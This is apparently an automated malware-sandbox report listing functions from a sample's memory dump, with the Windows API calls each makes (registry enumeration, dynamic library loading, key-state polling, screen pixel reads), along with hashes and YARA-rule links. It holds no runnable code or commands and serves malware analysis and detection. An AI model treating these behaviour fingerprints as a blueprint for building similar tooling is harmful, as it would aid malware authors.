String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: e2512e4eb22ad12e72e94d50599256bea9db8cb26ec6e29d2d6fe779b5e512e3
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: 54511871E00B25DBCB24DFA9FC5166EB7A2AF40B35F288729F825962C0D774DD50AB40

Function 00F80037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7FDAD,?,?), ref: 00F80E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F800FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F80183
RegCloseKey.ADVAPI32(?,?), ref: 00F801AF
RegCloseKey.ADVAPI32(00000000), ref: 00F801BC

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: fb1d114ef11c616483abe0b8863db597c0a074f4e753f1595c779c9128f9a968
Instruction ID: 884009ebbdcc995dbf11b54492f066b55e855aad0ab47c26364370657772a5f4
Opcode Fuzzy Hash: fb1d114ef11c616483abe0b8863db597c0a074f4e753f1595c779c9128f9a968
Instruction Fuzzy Hash: 76517B71608204AFC704EF54CC85EAAB7E9FF84314F44492DF595872A2DB35E908EB52

Function 00F7D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F7D927
GetProcAddress.KERNEL32(00000000,?), ref: 00F7D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00F7D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00F7DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F7DA21

Part of subcall function 00F05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F67896,?,?,00000000), ref: 00F05A2C
Part of subcall function 00F05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F67896,?,?,00000000,?,?), ref: 00F05A50

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: dc585d9c0cf4ae1c55647087c718c08924692be8ec6dd476765e14e1a53472d6
Instruction ID: c958c6a224b65df7d0e8186e9a5d55acc09ab72d173ba744bf06225977b64d54
Opcode Fuzzy Hash: dc585d9c0cf4ae1c55647087c718c08924692be8ec6dd476765e14e1a53472d6
Instruction Fuzzy Hash: 9A514775A04209DFDB00EFA8C8849ADB7B5FF08320B44C06AE959AB352D778ED45EF51

Function 00F6E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F6E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F6E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F6E687

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F6E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F6E6B4

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 78dba83d3945698856d9209fb986032fa33d7387b5479701b6d20f9f589007f1
Instruction ID: 6c817509a3fb7898e3ce4a1f8eac5c2c98e8343a8b0b641b385d9022aeedf0ec
Opcode Fuzzy Hash: 78dba83d3945698856d9209fb986032fa33d7387b5479701b6d20f9f589007f1
Instruction Fuzzy Hash: EC512D75A00105DFCB01EF64C985AAEBBF5EF09314F1480A9E809AB3A2DB75ED15EF50

Function 00F8A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca3fe10f15d8e723286cfa2761a4c41e885131f0ab76326f37679bfb5fdb2682
Instruction ID: a10d327ecc612441224139379f9f69045adc32833504c9c3c8c48bc195cb5051
Opcode Fuzzy Hash: ca3fe10f15d8e723286cfa2761a4c41e885131f0ab76326f37679bfb5fdb2682
Instruction Fuzzy Hash: FE418235E04508AFEB10EB28CC4DFE9BBA4EB09320F150266E915A72E1D770AD55FB51

Function 00F02344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00F02357
ScreenToClient.USER32(00FC57B0,?), ref: 00F02374
GetAsyncKeyState.USER32(00000001), ref: 00F02399
GetAsyncKeyState.USER32(00000002), ref: 00F023A7

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 00beece174988432655197c79df723d6f646cef792fcdbc079923b28501bba66
Instruction ID: 95571d8aca81c18a2295057d2fad2a35ad9871dce989c8f51955d855ec26297e
Opcode Fuzzy Hash: 00beece174988432655197c79df723d6f646cef792fcdbc079923b28501bba66
Instruction Fuzzy Hash: 17416F75A04119FBCF199FA8CC48AEDBB75BB05374F204319E829E62D0CB349954FBA1

Function 00F563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F563E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00F56433
TranslateMessage.USER32(?), ref: 00F5645C
DispatchMessageW.USER32(?), ref: 00F56466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F56475

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 8fe1612e8fbd8a33edbdee74d6ac8130cbce354b38008110db026d10f692c517
Instruction ID: 61566609146206e178a5bec656fd270580b6c96f059036f75b2d30b0f83f3da0
Opcode Fuzzy Hash: 8fe1612e8fbd8a33edbdee74d6ac8130cbce354b38008110db026d10f692c517
Instruction Fuzzy Hash: D531C43190064AAFDB64CFB0CD45FF67BA8AB01722F940165EA31C71A1E725A4CDF760

Function 00F58A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00F58A30
PostMessageW.USER32(?,00000201,00000001), ref: 00F58ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F58AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00F58AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F58AF8

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 75b24ea03ce706897d724e4b253a60672f7761faa5c993b31a6e84d33624b443
Instruction ID: 48a717f92db23b6a33711b6a5c44c9e85c6a8823a8017ca0237d97159143dcb8
Opcode Fuzzy Hash: 75b24ea03ce706897d724e4b253a60672f7761faa5c993b31a6e84d33624b443
Instruction Fuzzy Hash: 2131CF71900219EFDB14CF68D94CAAE3BA5EB04326F104229FA25E71D1C7B49919EB90

Function 00F5B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00F5B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F5B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F5B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F5B27F
_wcsstr.LIBCMT ref: 00F5B289

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: f0c547fce5efb503addaeb4f02ea5d411269905474a612ac7f74ba47322b1677
Instruction ID: d17d338a5b590c13227749aa21e0ca164f3f2cbb42bcb339e708a51b91d34b59
Opcode Fuzzy Hash: f0c547fce5efb503addaeb4f02ea5d411269905474a612ac7f74ba47322b1677
Instruction Fuzzy Hash: 88212232604204BAEB269B39AC09E7F7B98DF49721F108129FD04CA1A1EF658C44B3A0

Function 00F8B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

GetWindowLongW.USER32(?,000000F0), ref: 00F8B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F8B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F8B1CF
GetSystemMetrics.USER32(00000004), ref: 00F8B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F70E90,00000000), ref: 00F8B216

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 8d4b20718bd191359af944e82732e128d8a79734136fe798e5e648c8bc142e65
Instruction ID: 68d41c0ab9f276e89037432eb6373ab86c100a3adadbb37db4c0c0478a9e6f8b
Opcode Fuzzy Hash: 8d4b20718bd191359af944e82732e128d8a79734136fe798e5e648c8bc142e65
Instruction Fuzzy Hash: D1217171910655AFCB11AF38DC18BAA7BA4FB05771F154728F932DB1E0E7309851EB90

Function 00F59307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F59320

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F59352
__itow.LIBCMT ref: 00F5936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F59392
__itow.LIBCMT ref: 00F593A3

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 466cb38fc496e942be2ab7d7bf93cb34fde49af5167e1a4061b533b0cca72138
Instruction ID: 3eb5911c0eac432a517d24c6165fe76f237b47d3c934c7fed3737c8ba78e8dac
Opcode Fuzzy Hash: 466cb38fc496e942be2ab7d7bf93cb34fde49af5167e1a4061b533b0cca72138
Instruction Fuzzy Hash: 3721D331B04308EBDB14AAA09C89EEE7BACEB88721F044065FE04D71C0D6B4DD49B791

Function 00F75A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00F75A6E
GetForegroundWindow.USER32 ref: 00F75A85
GetDC.USER32(00000000), ref: 00F75AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00F75ACD
ReleaseDC.USER32(00000000,00000003), ref: 00F75B08

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: dfa09cb7d905317ce3f55e622cd4ffd5c53e02c80f90f6156998aef322082d07
Instruction ID: 2f9aa79a686a1bb143c6d6d90a59294ccd6a19aac10c793e78353059de2d8357
Opcode Fuzzy Hash: dfa09cb7d905317ce3f55e622cd4ffd5c53e02c80f90f6156998aef322082d07
Instruction Fuzzy Hash: 4B21C675A00104AFDB00EF64DC84AAABBF5EF48350F14C179F849D7352DA74AD05EB51

Function 00F012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F0134D
SelectObject.GDI32(?,00000000), ref: 00F0135C
BeginPath.GDI32(?), ref: 00F01373
SelectObject.GDI32(?,00000000), ref: 00F0139C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d5b4ced404c95b62c95ac233866de254123bb0ad5f53cdecf90dc99cc13b82ea
Instruction ID: 54a8c76f059b768da2226c091c8d2a9d8d240abb4ced8427d7bddbe80c9d3075
Opcode Fuzzy Hash: d5b4ced404c95b62c95ac233866de254123bb0ad5f53cdecf90dc99cc13b82ea
Instruction Fuzzy Hash: CF215C3180060CEFDB109F25DE0ABA97BA8FB00B61F544226F810971F0D771A895FF90

Function 00F5BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00F5BCB3
_memcmp.LIBCMT ref: 00F5BCD1
_memcmp.LIBCMT ref: 00F5BCE4
_memcmp.LIBCMT ref: 00F5BCFC
_memcmp.LIBCMT ref: 00F5BD14

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: edcba6187771ac90c2ccb0ebe7414dc294bef1ec55aaa75f728566480245b15c
Instruction ID: 7647cb23cc44d6d6eff8fcffb91e22afaba047704fde18e3c8d1e8a95eaf6de2
Opcode Fuzzy Hash: edcba6187771ac90c2ccb0ebe7414dc294bef1ec55aaa75f728566480245b15c
Instruction Fuzzy Hash: 2B01D8726001197BE604BB11AD46FBBB75CEE613A9F144021FF0997342FB54DE14B2A9

Function 00F64A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00F64ABA
__beginthreadex.LIBCMT ref: 00F64AD8
MessageBoxW.USER32(?,?,?,?), ref: 00F64AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F64B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F64B0A

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 919f6e4a1665137beda5567a87563d09da0b9cdd53678f3c65710dc97080c342
Instruction ID: 185ceb8da0ec3f28b67476391b7429d41f640bf2d708750a830fd7cd3c8f0895
Opcode Fuzzy Hash: 919f6e4a1665137beda5567a87563d09da0b9cdd53678f3c65710dc97080c342
Instruction Fuzzy Hash: C511087690461CBFC700AFA8EC09EEB7FACEB45720F144265F815D3250D675E944ABA0

Function 00F58202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F5821E
GetLastError.KERNEL32(?,00F57CE2,?,?,?), ref: 00F58228
GetProcessHeap.KERNEL32(00000008,?,?,00F57CE2,?,?,?), ref: 00F58237
HeapAlloc.KERNEL32(00000000,?,00F57CE2,?,?,?), ref: 00F5823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F58255

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: a4348a17382b8acd83d90cd95e4fe5f8143b61ff55b5bd31d6f1d4121ec8ef69
Instruction ID: 9fc3afbc0874f9984cbc138bead2c3303298bd16202e0fdc351dfe4f485ab81c
Opcode Fuzzy Hash: a4348a17382b8acd83d90cd95e4fe5f8143b61ff55b5bd31d6f1d4121ec8ef69
Instruction Fuzzy Hash: F3016271600608BFDB104FA6DC48DB77F6CFF857A5B500529FD09D2120DA318C15EB60

Function 00F5710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?,?,00F57455), ref: 00F57127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?), ref: 00F57142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?), ref: 00F57150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?), ref: 00F57160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?), ref: 00F5716C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 40f032f6c48afb45aadf14568c021d6de1e683df166fd696d9ce5df74ecf1147
Instruction ID: 97aadd42b7fb70afc2001ccce639b4b0b899e66153cde8cdc4c401936dd58704
Opcode Fuzzy Hash: 40f032f6c48afb45aadf14568c021d6de1e683df166fd696d9ce5df74ecf1147
Instruction Fuzzy Hash: D7018F72A01718BFDB115F65EC44BAA7BADEF447A2F140064FE08D2220DB31DD48ABA0

Function 00F65244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F65260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F6526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F65276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F65280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F652BC

Memory Dump Source

